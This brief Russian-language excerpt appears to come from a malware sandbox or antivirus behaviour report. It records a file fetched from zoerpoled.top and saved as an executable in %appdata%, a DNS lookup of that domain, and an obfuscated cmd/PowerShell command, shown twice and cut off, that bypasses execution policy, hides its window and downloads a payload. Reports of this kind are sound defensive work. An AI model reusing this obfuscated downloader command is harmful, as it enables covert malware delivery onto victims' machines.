Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwe^rSh^eLl.e^X^E ^-^ex^ecuTI^o^nP^OLicY BY^pass^ ^-^N^O^Pr^OFi^l^E -WINDow^STyLe h^IdDE^N (NE^w-^oBjeC^t^ Sys^tem.^NE^T.WE^Bc^lieNt).d^oWNLoaDF^iLE('http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POwe^rSh^eLl.e^X^E ^-^ex^ecuTI^o^nP^OLicY BY^pass^ ^-^N^O^Pr^OFi^l^E -WINDow^STyLe h^IdDE^N (NE^w-^oBjeC^t^ Sys^tem.^NE^T.WE^Bc^lieNt).d^oWNLoaDF^iLE('http://www.zoerpoled....' (со скрытым окном)